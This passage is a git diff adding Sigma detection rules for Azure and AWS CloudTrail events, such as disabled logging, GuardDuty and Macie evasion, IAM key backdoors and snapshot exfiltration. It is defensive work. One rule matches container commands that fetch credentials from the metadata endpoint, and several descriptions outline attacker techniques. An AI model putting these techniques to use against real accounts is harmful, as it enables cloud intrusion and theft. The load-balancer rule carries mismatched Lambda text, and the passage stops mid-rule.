+title: Azure VPN Connection Modified or Deleted +id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 +description: Identifies when a VPN connection is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE + - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml b/bin/main/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml new file mode 100644 index 000000000..298585fae --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml @@ -0,0 +1,22 @@ +title: AWS Attached Malicious Lambda Layer +id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d +description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. +author: Austin Songer +status: experimental +date: 2021/09/23 +references: + - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: lambda.amazonaws.com + eventName|startswith: UpdateFunctionConfiguration + condition: selection +level: medium +tags: + - attack.privilege_escalation +falsepositives: + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_cloudtrail_disable_logging.yml b/bin/main/rules/cloudtrail/aws_cloudtrail_disable_logging.yml new file mode 100644 index 000000000..965007fc9 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_cloudtrail_disable_logging.yml @@ -0,0 +1,26 @@ +title: AWS CloudTrail Important Change +id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74 +status: experimental +description: Detects disabling, deleting and updating of a Trail +author: vitaliy0x1 +date: 2020/01/21 +modified: 2021/08/09 +references: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: cloudtrail.amazonaws.com + eventName: + - StopLogging + - UpdateTrail + - DeleteTrail + condition: selection_source +falsepositives: + - Valid change in a Trail +level: medium +tags: + - attack.defense_evasion + - attack.t1562.001 diff --git a/bin/main/rules/cloudtrail/aws_config_disable_recording.yml b/bin/main/rules/cloudtrail/aws_config_disable_recording.yml new file mode 100644 index 000000000..6a0d9e6a3 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_config_disable_recording.yml @@ -0,0 +1,23 @@ +title: AWS Config Disabling Channel/Recorder +id: 07330162-dba1-4746-8121-a9647d49d297 +status: experimental +description: Detects AWS Config Service disabling +author: vitaliy0x1 +date: 2020/01/21 +modified: 2021/08/09 +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: config.amazonaws.com + eventName: + - DeleteDeliveryChannel + - StopConfigurationRecorder + condition: selection_source +falsepositives: + - Valid change in AWS Config Service +level: high +tags: + - attack.defense_evasion + - attack.t1562.001 diff --git a/bin/main/rules/cloudtrail/aws_create_load_balancer_layer.yml b/bin/main/rules/cloudtrail/aws_create_load_balancer_layer.yml new file mode 100644 index 000000000..037c1d866 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_create_load_balancer_layer.yml @@ -0,0 +1,22 @@ +title: AWS Create Load Balancer +id: 97fbabf8-8e1b-47a2-b8d5-a418d2b95b3d +description: AWS Create Load Balancer +author: Austin Songer +status: experimental +date: 2021/09/23 +references: + - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: elasticloadbalancing.amazonaws.com + eventName|startswith: CreateLoadBalancer + condition: selection +level: medium +tags: + - attack.privilege_escalation +falsepositives: + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_ec2_disable_encryption.yml b/bin/main/rules/cloudtrail/aws_ec2_disable_encryption.yml new file mode 100644 index 000000000..cafbe45b6 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_ec2_disable_encryption.yml @@ -0,0 +1,25 @@ +title: AWS EC2 Disable EBS Encryption +id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 +status: stable +description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. +author: Sittikorn S +date: 2021/06/29 +modified: 2021/08/20 +references: + - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html +tags: + - attack.impact + - attack.t1486 + - attack.t1565 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: ec2.amazonaws.com + eventName: DisableEbsEncryptionByDefault + condition: selection +falsepositives: + - System Administrator Activities + - DEV, UAT, SAT environment. You should apply this rule with PROD account only. +level: medium diff --git a/bin/main/rules/cloudtrail/aws_ec2_download_userdata.yml b/bin/main/rules/cloudtrail/aws_ec2_download_userdata.yml new file mode 100644 index 000000000..af4e5f631 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_ec2_download_userdata.yml @@ -0,0 +1,25 @@ +title: AWS EC2 Download Userdata +id: 26ff4080-194e-47e7-9889-ef7602efed0c +status: experimental +description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. +author: faloker +date: 2020/02/11 +modified: 2021/08/20 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/ec2__download_userdata/main.py +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: ec2.amazonaws.com + requestParameters.attribute: userData + eventName: DescribeInstanceAttribute + timeframe: 30m + condition: selection_source +falsepositives: + - Assets management software like device42 +level: medium +tags: + - attack.exfiltration + - attack.t1020 diff --git a/bin/main/rules/cloudtrail/aws_ec2_startup_script_change.yml b/bin/main/rules/cloudtrail/aws_ec2_startup_script_change.yml new file mode 100644 index 000000000..730abebc6 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_ec2_startup_script_change.yml @@ -0,0 +1,26 @@ +title: AWS EC2 Startup Shell Script Change +id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df +status: experimental +description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. +author: faloker +date: 2020/02/12 +modified: 2022/06/07 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__startup_shell_script/main.py#L9 +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: ec2.amazonaws.com + requestParameters.attribute: 'userData' + eventName: ModifyInstanceAttribute + condition: selection_source +falsepositives: + - Valid changes to the startup script +level: high +tags: + - attack.execution + - attack.t1059.001 + - attack.t1059.003 + - attack.t1059.004 diff --git a/bin/main/rules/cloudtrail/aws_ec2_vm_export_failure.yml b/bin/main/rules/cloudtrail/aws_ec2_vm_export_failure.yml new file mode 100644 index 000000000..973cf9dc5 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_ec2_vm_export_failure.yml @@ -0,0 +1,29 @@ +title: AWS EC2 VM Export Failure +id: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b +status: experimental +description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. +author: Diogo Braz +date: 2020/04/16 +modified: 2021/08/20 +references: + - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventName: 'CreateInstanceExportTask' + eventSource: 'ec2.amazonaws.com' + filter1: + errorMessage: '*' + filter2: + errorCode: '*' + filter3: + responseElements|contains: 'Failure' + condition: selection and (filter1 or filter2 or filter3) +level: low +tags: +- attack.collection +- attack.t1005 +- attack.exfiltration +- attack.t1537 diff --git a/bin/main/rules/cloudtrail/aws_ecs_task_definition_backdoor.yml b/bin/main/rules/cloudtrail/aws_ecs_task_definition_backdoor.yml new file mode 100644 index 000000000..52f68dbe4 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_ecs_task_definition_backdoor.yml @@ -0,0 +1,30 @@ +title: AWS ECS Backdoor Task Definition +id: b94bf91e-c2bf-4047-9c43-c6810f43baad +status: experimental +description: Detects when an Elastic Container Service (ECS) Task Definition has been modified and run. This can indicate an adversary adding a backdoor to establish persistence or escalate privileges. This rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment. +author: Darin Smith +date: 2022/06/07 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/ecs__backdoor_task_def/main.py + - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html + - https://attack.mitre.org/techniques/T1525 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: ecs.amazonaws.com + eventName: + - DescribeTaskDefinition + - RegisterTaskDefinition + - RunTask + requestParameters.containerDefinitions.command|contains|all: + - '169.254' + - '$AWS_CONTAINER_CREDENTIALS' + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1525 +falsepositives: + - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons diff --git a/bin/main/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml b/bin/main/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml new file mode 100644 index 000000000..fac7b591d --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml @@ -0,0 +1,21 @@ +title: AWS EFS Fileshare Modified or Deleted +id: 25cb1ba1-8a19-4a23-a198-d252664c8cef +status: experimental +description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. +author: Austin Songer @austinsonger +date: 2021/08/15 +references: + - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: elasticfilesystem.amazonaws.com + eventName: DeleteFileSystem + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact diff --git a/bin/main/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml b/bin/main/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml new file mode 100644 index 000000000..59b3e7304 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: AWS EFS Fileshare Mount Modified or Deleted +id: 6a7ba45c-63d8-473e-9736-2eaabff79964 +status: experimental +description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. +author: Austin Songer @austinsonger +date: 2021/08/15 +references: + - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: elasticfilesystem.amazonaws.com + eventName: DeleteMountTarget + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact + - attack.t1485 diff --git a/bin/main/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml b/bin/main/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml new file mode 100644 index 000000000..49b53b0a6 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml @@ -0,0 +1,26 @@ +title: AWS EKS Cluster Created or Deleted +id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +description: Identifies when an EKS cluster is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://any-api.com/amazonaws_com/eks/docs/API_Description +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: eks.amazonaws.com + eventName: + - CreateCluster + - DeleteCluster + condition: selection +level: low +tags: + - attack.impact + - attack.t1485 +falsepositives: + - EKS Cluster being created or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_elasticache_security_group_created.yml b/bin/main/rules/cloudtrail/aws_elasticache_security_group_created.yml new file mode 100644 index 000000000..51ec4468c --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_elasticache_security_group_created.yml @@ -0,0 +1,24 @@ +title: AWS ElastiCache Security Group Created +id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 +description: Detects when an ElastiCache security group has been created. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +modified: 2021/08/19 +references: + - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: elasticache.amazonaws.com + eventName: 'CreateCacheSecurityGroup' + condition: selection +level: low +tags: + - attack.persistence + - attack.t1136 + - attack.t1136.003 +falsepositives: +- A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml b/bin/main/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml new file mode 100644 index 000000000..0ee02e0f6 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml @@ -0,0 +1,28 @@ +title: AWS ElastiCache Security Group Modified or Deleted +id: 7c797da2-9cf2-4523-ba64-33b06339f0cc +description: Identifies when an ElastiCache security group has been modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +modified: 2021/08/19 +references: + - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: elasticache.amazonaws.com + eventName: + - 'DeleteCacheSecurityGroup' + - 'AuthorizeCacheSecurityGroupIngress' + - 'RevokeCacheSecurityGroupIngress' + - 'AuthorizeCacheSecurityGroupEgress' + - 'RevokeCacheSecurityGroupEgress' + condition: selection +level: low +tags: + - attack.impact + - attack.t1531 +falsepositives: +- A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_enum_listing.yml b/bin/main/rules/cloudtrail/aws_enum_listing.yml new file mode 100644 index 000000000..19143dc65 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_enum_listing.yml @@ -0,0 +1,23 @@ +title: Account Enumeration on AWS +id: e9c14b23-47e2-4a8b-8a63-d36618e33d70 +status: experimental +description: Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time. +author: toffeebr33k +date: 2020/11/21 +modified: 2021/08/09 +logsource: + product: aws + service: cloudtrail +detection: + selection_eventname: + eventName: list* + timeframe: 10m + condition: selection_eventname +fields: + - userIdentity.arn +falsepositives: + - AWS Config or other configuration scanning activities +level: low +tags: + - attack.discovery + - attack.t1592 diff --git a/bin/main/rules/cloudtrail/aws_guardduty_disruption.yml b/bin/main/rules/cloudtrail/aws_guardduty_disruption.yml new file mode 100644 index 000000000..259414a9f --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_guardduty_disruption.yml @@ -0,0 +1,23 @@ +title: AWS GuardDuty Important Change +id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 +status: experimental +description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. +author: faloker +date: 2020/02/11 +modified: 2021/08/09 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/guardduty__whitelist_ip/main.py#L9 +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: guardduty.amazonaws.com + eventName: CreateIPSet + condition: selection_source +falsepositives: + - Valid change in the GuardDuty (e.g. to ignore internal scanners) +level: high +tags: + - attack.defense_evasion + - attack.t1562.001 diff --git a/bin/main/rules/cloudtrail/aws_iam_backdoor_users_keys.yml b/bin/main/rules/cloudtrail/aws_iam_backdoor_users_keys.yml new file mode 100644 index 000000000..0d7cd569a --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_iam_backdoor_users_keys.yml @@ -0,0 +1,31 @@ +title: AWS IAM Backdoor Users Keys +id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 +status: experimental +description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. +author: faloker +date: 2020/02/12 +modified: 2021/08/20 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__backdoor_users_keys/main.py +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: iam.amazonaws.com + eventName: CreateAccessKey + filter: + userIdentity.arn|contains: responseElements.accessKey.userName + condition: selection_source and not filter +fields: + - userIdentity.arn + - responseElements.accessKey.userName + - errorCode + - errorMessage +falsepositives: + - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming) + - AWS API keys legitimate exchange workflows +level: medium +tags: + - attack.persistence + - attack.t1098 diff --git a/bin/main/rules/cloudtrail/aws_lambda_function_created_or_invoked.yml b/bin/main/rules/cloudtrail/aws_lambda_function_created_or_invoked.yml new file mode 100644 index 000000000..1e680658a --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_lambda_function_created_or_invoked.yml @@ -0,0 +1,27 @@ +title: AWS Lambda Function Created or Invoked +id: d914951b-52c8-485f-875e-86abab710c0b +description: Detects when an user creates or invokes a lambda function. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/03 +modified: 2021/10/13 +references: + - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ +logsource: + product: aws + service: cloudtrail +detection: + selection1: + eventSource: lambda.amazonaws.com + eventName: CreateFunction + selection2: + eventSource: lambda.amazonaws.com + eventName: Invoke + condition: selection1 or selection2 +level: low +tags: + - attack.privilege_escalation + - attack.t1078 +falsepositives: + - Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_macic_evasion.yml b/bin/main/rules/cloudtrail/aws_macic_evasion.yml new file mode 100644 index 000000000..cb8a1b82f --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_macic_evasion.yml @@ -0,0 +1,36 @@ +title: AWS Macie Evasion +id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 +status: experimental +description: Detects evade to Macie detection. +author: Sittikorn S +date: 2021/07/06 +references: + - https://docs.aws.amazon.com/cli/latest/reference/macie/ +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventName: + - 'ArchiveFindings' + - 'CreateFindingsFilter' + - 'DeleteMember' + - 'DisassociateFromMasterAccount' + - 'DisassociateMember' + - 'DisableMacie' + - 'DisableOrganizationAdminAccount' + - 'UpdateFindingsFilter' + - 'UpdateMacieSession' + - 'UpdateMemberSession' + - 'UpdateClassificationJob' + timeframe: 10m + condition: selection +fields: + - sourceIPAddress + - userIdentity.arn +falsepositives: + - System or Network administrator behaviors +level: medium diff --git a/bin/main/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml b/bin/main/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml new file mode 100644 index 000000000..c8d356615 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml @@ -0,0 +1,30 @@ +title: AWS Glue Development Endpoint Activity +id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +description: Detects possible suspicious glue development endpoint activity. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/03 +modified: 2021/10/13 +references: + - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ + - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html +logsource: + product: aws + service: cloudtrail +detection: + selection1: + eventSource: glue.amazonaws.com + eventName: CreateDevEndpoint + selection2: + eventSource: glue.amazonaws.com + eventName: DeleteDevEndpoint + selection3: + eventSource: glue.amazonaws.com + eventName: UpdateDevEndpoint + condition: selection1 or selection2 or selection3 +level: low +tags: + - attack.privilege_escalation +falsepositives: + - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_rds_change_master_password.yml b/bin/main/rules/cloudtrail/aws_rds_change_master_password.yml new file mode 100644 index 000000000..161c07abb --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_rds_change_master_password.yml @@ -0,0 +1,24 @@ +title: AWS RDS Master Password Change +id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 +status: experimental +description: Detects the change of database master password. It may be a part of data exfiltration. +author: faloker +date: 2020/02/12 +modified: 2021/08/20 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: rds.amazonaws.com + responseElements.pendingModifiedValues.masterUserPassword: '*' + eventName: ModifyDBInstance + condition: selection_source +falsepositives: + - Benign changes to a db instance +level: medium +tags: + - attack.exfiltration + - attack.t1020 diff --git a/bin/main/rules/cloudtrail/aws_rds_public_db_restore.yml b/bin/main/rules/cloudtrail/aws_rds_public_db_restore.yml new file mode 100644 index 000000000..dbc413919 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_rds_public_db_restore.yml @@ -0,0 +1,24 @@ +title: Restore Public AWS RDS Instance +id: c3f265c7-ff03-4056-8ab2-d486227b4599 +status: experimental +description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. +author: faloker +date: 2020/02/12 +modified: 2021/08/20 +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: rds.amazonaws.com + responseElements.publiclyAccessible: 'true' + eventName: RestoreDBInstanceFromDBSnapshot + condition: selection_source +falsepositives: + - Unknown +level: high +tags: + - attack.exfiltration + - attack.t1020 diff --git a/bin/main/rules/cloudtrail/aws_root_account_usage.yml b/bin/main/rules/cloudtrail/aws_root_account_usage.yml new file mode 100644 index 000000000..14bbc35e5 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_root_account_usage.yml @@ -0,0 +1,24 @@ +title: AWS Root Credentials +id: 8ad1600d-e9dc-4251-b0ee-a65268f29add +status: experimental +description: Detects AWS root account usage +author: vitaliy0x1 +date: 2020/01/21 +modified: 2021/08/09 +references: + - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html +logsource: + product: aws + service: cloudtrail +detection: + selection_usertype: + userIdentity.type: Root + selection_eventtype: + eventType: AwsServiceEvent + condition: selection_usertype and not selection_eventtype +falsepositives: + - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html +level: medium +tags: + - attack.privilege_escalation + - attack.t1078.004 diff --git a/bin/main/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml b/bin/main/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml new file mode 100644 index 000000000..9e6219023 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml @@ -0,0 +1,25 @@ +title: AWS Route 53 Domain Transfer Lock Disabled +id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 +description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. +author: Elastic, Austin Songer @austinsonger +status: experimental +date: 2021/07/22 +references: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: route53.amazonaws.com + eventName: DisableDomainTransferLock + condition: selection +level: low +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml b/bin/main/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml new file mode 100644 index 000000000..69302a914 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml @@ -0,0 +1,23 @@ +title: AWS Route 53 Domain Transferred to Another Account +id: b056de1a-6e6e-4e40-a67e-97c9808cf41b +description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. +author: Elastic, Austin Songer @austinsonger +status: experimental +date: 2021/07/22 +references: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: route53.amazonaws.com + eventName: TransferDomainToAnotherAwsAccount + condition: selection +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/bin/main/rules/cloudtrail/aws_s3_data_management_tampering.yml b/bin/main/rules/cloudtrail/aws_s3_data_management_tampering.yml new file mode 100644 index 000000000..2080b16d0 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_s3_data_management_tampering.yml @@ -0,0 +1,36 @@ +title: AWS S3 Data Management Tampering +id: 78b3756a-7804-4ef7-8555-7b9024a02d2d +description: Detects when a user tampers with S3 data management in Amazon Web Services. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +modified: 2021/08/19 +references: + - https://github.com/elastic/detection-rules/pull/1145/files + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: s3.amazonaws.com + eventName: + - PutBucketLogging + - PutBucketWebsite + - PutEncryptionConfiguration + - PutLifecycleConfiguration + - PutReplicationConfiguration + - ReplicateObject + - RestoreObject + condition: selection +level: low +tags: + - attack.exfiltration + - attack.t1537 +falsepositives: +- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_securityhub_finding_evasion.yml b/bin/main/rules/cloudtrail/aws_securityhub_finding_evasion.yml new file mode 100644 index 000000000..2a5361e0f --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_securityhub_finding_evasion.yml @@ -0,0 +1,30 @@ +title: AWS SecurityHub Findings Evasion +id: a607e1fe-74bf-4440-a3ec-b059b9103157 +status: stable +description: Detects the modification of the findings on SecurityHub. +author: Sittikorn S +date: 2021/06/28 +references: + - https://docs.aws.amazon.com/cli/latest/reference/securityhub/ +tags: + - attack.defense_evasion + - attack.t1562 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: securityhub.amazonaws.com + eventName: + - 'BatchUpdateFindings' + - 'DeleteInsight' + - 'UpdateFindings' + - 'UpdateInsight' + condition: selection +fields: + - sourceIPAddress + - userIdentity.arn +falsepositives: + - System or Network administrator behaviors + - DEV, UAT, SAT environment. You should apply this rule with PROD environment only. +level: high diff --git a/bin/main/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml b/bin/main/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml new file mode 100644 index 000000000..11ddcf8b4 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml @@ -0,0 +1,24 @@ +title: AWS Snapshot Backup Exfiltration +id: abae8fec-57bd-4f87-aff6-6e3db989843d +status: test +description: Detects the modification of an EC2 snapshot's permissions to enable access from another account +author: Darin Smith +date: 2021/05/17 +modified: 2021/08/19 +references: + - https://www.justice.gov/file/1080281/download + - https://attack.mitre.org/techniques/T1537/ +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: ec2.amazonaws.com + 